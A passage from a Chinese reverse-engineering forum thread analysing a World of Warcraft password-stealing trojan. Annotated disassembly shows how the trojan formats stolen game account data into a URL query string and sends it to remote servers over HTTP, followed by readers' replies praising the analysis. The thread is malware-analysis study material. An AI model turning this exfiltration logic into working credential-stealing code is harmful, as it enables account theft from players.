10004758 |. 5E pop esi
10004759 |. 5B pop ebx
1000475A |> C9 leave
1000475B \. C3 retn
关键call 13,发送游戏信息,代码如下:
10003FA2 /$ 55 push ebp
10003FA3 |. 8BEC mov ebp, esp
10003FA5 |. 81EC 14050000 sub esp, 514
10003FAB |. 68 3C300110 push 1001303C
10003FB0 |. E8 7CFCFFFF call 10003C31 取各个信息长度
10003FB5 |. 50 push eax
10003FB6 |. 68 382F0110 push 10012F38
10003FBB |. FF35 2C2F0110 push dword ptr [10012F2C]
10003FC1 |. 8D85 ECFAFFFF lea eax, [local.325]
10003FC7 |. FF35 302F0110 push dword ptr [10012F30]
10003FCD |. 68 753D0110 push 10013D75
10003FD2 |. 68 9D470110 push 1001479D
10003FD7 |. FF35 202F0110 push dword ptr [10012F20]
10003FDD |. FF35 142F0110 push dword ptr [10012F14]
10003FE3 |. FF35 102F0110 push dword ptr [10012F10]
10003FE9 |. 68 0C2E0110 push 10012E0C ; ASCII "2090008637"
10003FEE |. 68 082D0110 push 10012D08
10003FF3 |. 68 002B0110 push 10012B00
10003FF8 |. 68 F4270110 push 100127F4
10003FFD |. 68 F0260110 push 100126F0
10004002 |. 68 EC250110 push 100125EC
10004007 |. 68 E4230110 push 100123E4
1000400C |. 68 E0220110 push 100122E0 ; |
10004011 |. 68 C04D0110 push 10014DC0 ; |<%s> = ""
10004016 |. 68 7C890110 push 1001897C ; |Format = "?Gam9*&e=29¶=%s&%ves=076&d00=%s&d01=%s&d10=%s&d11=%
s&d21=%s&d30=%s&d31=%s&d32=%s&d40=%u&d45=%u&d42=%u&d60=%s9*&&d61=%s&d70=%d&d71=%d&d50=%s&d90=%d&d62=%s"
1000401B |. 50 push eax ; |s
1000401C |. FF15 90610110 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA 发送游戏信息格式化
10004022 |. 68 08500010 push 10005008
10004027 |. 8D85 ECFAFFFF lea eax, [local.325]
1000402D |. 68 08880110 push 10018808 ; ASCII "9*&"
10004032 |. 50 push eax
10004033 |. E8 9AE7FFFF call 100027D2 字符处理,除去9*&字符
10004038 |. 83C4 60 add esp, 60
1000403B |. 8D85 ECFAFFFF lea eax, [local.325]
10004041 |. 50 push eax
10004042 |. E8 13FEFFFF call 10003E5A 关键call 14,网络发信
10004047 |. 59 pop ecx
10004048 |. C9 leave
10004049 \. C3 retn
关键call 14,网络发信,代码如下:
10003E5A /$ 55 push ebp
10003E5B |. 8BEC mov ebp, esp
10003E5D |. 81EC 300B0000 sub esp, 0B30
10003E63 |. A0 08500010 mov al, byte ptr [10005008]
10003E68 |. 53 push ebx
10003E69 |. 56 push esi
10003E6A |. 57 push edi
10003E6B |. 6A 40 push 40
10003E6D |. 8885 F8FEFFFF mov byte ptr [ebp-108], al
10003E73 |. 59 pop ecx
10003E74 |. 33C0 xor eax, eax
10003E76 |. 8DBD F9FEFFFF lea edi, dword ptr [ebp-107]
10003E7C |. 803D B0490110 0>cmp byte ptr [100149B0], 0
10003E83 |. F3:AB rep stos dword ptr es:[edi]
10003E85 |. 8B35 90610110 mov esi, dword ptr [<&USER32.wsprint>; user32.wsprintfA
10003E8B |. BB 34710110 mov ebx, 10017134 ; ASCII "%s%s"
10003E90 |. 66:AB stos word ptr es:[edi]
10003E92 |. AA stos byte ptr es:[edi]
10003E93 |. BF 04010000 mov edi, 104
10003E98 |. 74 2D je short 10003EC7
10003E9A |. FF75 08 push [arg.1] ; /<%s>
10003E9D |. 8D85 D0F4FFFF lea eax, [local.716] ; |
10003EA3 |. 68 B0490110 push 100149B0 ; |<%s> = ""
10003EA8 |. 53 push ebx ; |Format => "%s%s"
10003EA9 |. 50 push eax ; |s
10003EAA |. FFD6 call esi ; \wsprintfA
10003EAC |. 8D45 FC lea eax, [local.1]
10003EAF |. 57 push edi
10003EB0 |. 50 push eax
10003EB1 |. 8D85 F8FEFFFF lea eax, [local.66]
10003EB7 |. 50 push eax
10003EB8 |. 8D85 D0F4FFFF lea eax, [local.716]
10003EBE |. 50 push eax
10003EBF |. E8 9EEFFFFF call 10002E62 关键call 15,网络连接
10003EC4 |. 83C4 20 add esp, 20
10003EC7 |> 803D B84B0110 0>cmp byte ptr [10014BB8], 0
10003ECE |. 74 2D je short 10003EFD
10003ED0 |. FF75 08 push [arg.1]
10003ED3 |. 8D85 D0F4FFFF lea eax, [local.716]
10003ED9 |. 68 B84B0110 push 10014BB8
10003EDE |. 53 push ebx
10003EDF |. 50 push eax
10003EE0 |. FFD6 call esi
10003EE2 |. 8D45 FC lea eax, [local.1]
10003EE5 |. 57 push edi
10003EE6 |. 50 push eax
10003EE7 |. 8D85 F8FEFFFF lea eax, [local.66]
10003EED |. 50 push eax
10003EEE |. 8D85 D0F4FFFF lea eax, [local.716]
10003EF4 |. 50 push eax
10003EF5 |. E8 68EFFFFF call 10002E62
10003EFA |. 83C4 20 add esp, 20
10003EFD |> 803D BC4C0110 0>cmp byte ptr [10014CBC], 0
10003F04 |. 74 2D je short 10003F33
10003F06 |. FF75 08 push [arg.1]
10003F09 |. 8D85 D0F4FFFF lea eax, [local.716]
10003F0F |. 68 BC4C0110 push 10014CBC
10003F14 |. 53 push ebx
10003F15 |. 50 push eax
10003F16 |. FFD6 call esi
10003F18 |. 8D45 FC lea eax, [local.1]
10003F1B |. 57 push edi
10003F1C |. 50 push eax
10003F1D |. 8D85 F8FEFFFF lea eax, [local.66]
10003F23 |. 50 push eax
10003F24 |. 8D85 D0F4FFFF lea eax, [local.716]
10003F2A |. 50 push eax
10003F2B |. E8 32EFFFFF call 10002E62
10003F30 |. 83C4 20 add esp, 20
10003F33 |> 5F pop edi
10003F34 |. 5E pop esi
10003F35 |. 5B pop ebx
10003F36 |. C9 leave
10003F37 \. C3 retn
关键call 15,用ULR方式发信,代码如下:
10002E62 /$ 55 push ebp
10002E63 |. 8BEC mov ebp, esp
10002E65 |. 51 push ecx
10002E66 |. 53 push ebx
10002E67 |. 56 push esi
10002E68 |. 57 push edi
10002E69 |. FF75 08 push [arg.1]
10002E6C |. E8 51FCFFFF call 10002AC2
10002E71 |. 59 pop ecx
10002E72 |. C745 FC 0200000>mov [local.1], 2
10002E79 |. 33F6 xor esi, esi
10002E7B |> 56 /push esi
10002E7C |. 56 |push esi
10002E7D |. 56 |push esi
10002E7E |. 56 |push esi
10002E7F |. 68 F0880110 |push 100188F0 ; ASCII "IE6.0"
10002E84 |. FF15 D4220110 |call dword ptr [100122D4]
10002E8A |. 8BD8 |mov ebx, eax
10002E8C |. 3BDE |cmp ebx, esi
10002E8E |. 74 1F |je short 10002EAF
10002E90 |. 56 |push esi
10002E91 |. 68 00000080 |push 80000000
10002E96 |. 56 |push esi
10002E97 |. 56 |push esi
10002E98 |. FF75 08 |push [arg.1]
10002E9B |. 53 |push ebx
10002E9C |. FF15 D8220110 |call dword ptr [100122D8]
10002EA2 |. 8BF8 |mov edi, eax
10002EA4 |. 3BFE |cmp edi, esi
10002EA6 |. 75 13 |jnz short 10002EBB
10002EA8 |. 53 |push ebx
10002EA9 |. FF15 CC220110 |call dword ptr [100122CC]
10002EAF |> 8B45 FC |mov eax, [local.1]
10002EB2 |. FF4D FC |dec [local.1]
10002EB5 |. 85C0 |test eax, eax
10002EB7 |.^ 75 C2 \jnz short 10002E7B
10002EB9 |. EB 2F jmp short 10002EEA
10002EBB |> 68 04010000 push 104 ; /n = 104 (260.)
10002EC0 |. 56 push esi ; |c
10002EC1 |. FF75 0C push [arg.2] ; |s
10002EC4 |. E8 7B1F0000 call <jmp.&MSVCRT.memset> ; \memset
10002EC9 |. 83C4 0C add esp, 0C
10002ECC |. FF75 10 push [arg.3]
10002ECF |. FF75 14 push [arg.4]
10002ED2 |. FF75 0C push [arg.2]
10002ED5 |. 57 push edi
10002ED6 |. FF15 D0220110 call dword ptr [100122D0]
10002EDC |. 57 push edi
10002EDD |. FF15 CC220110 call dword ptr [100122CC]
10002EE3 |. 53 push ebx
10002EE4 |. FF15 CC220110 call dword ptr [100122CC]
10002EEA |> 6A 01 push 1
10002EEC |. 58 pop eax
10002EED |. 5F pop edi
10002EEE |. 5E pop esi
10002EEF |. 5B pop ebx
10002EF0 |. C9 leave
10002EF1 \. C3 retn 今天要学习各位大侠 分析得很好~建议加精~发个技术贴也不容易啊~给点鼓励啊!别抹杀了别人的激情~ [quote]标题:魔兽盗号木马Trojan.Win32.OnlineGame.PSW分析
链接:[url]http://www.unpack.cn/viewthread.php?tid=45323[/url]
贴者:qiang
日期: 2010-1-27 23:13[/quote] 和我前段时间看的一个xy2的盗号木马的关键代码几乎一样 [b]回复 [url=http://www.unpack.cn/redirect.php?goto=findpost&pid=594477&ptid=45323]12#[/url] [i]小子贼野[/i] [/b]
这些木马以一个系列出现,代码风格相似或者相同,针对不同的游戏。 呵呵 文如其名 见过好多次这个样本 嘎嘎,学习下了。呵呵 [b]回复 [url=http://bbs.unpack.cn/redirect.php?goto=findpost&pid=596932&ptid=45323]13#[/url] [i]qiang[/i] [/b]
难怪我说么看着那么熟悉 分析很详细,学习中- - 好强大!纠结啊,自己啥时候能到那个境界? 不错,分析的很详细··学习了··
页:
[1]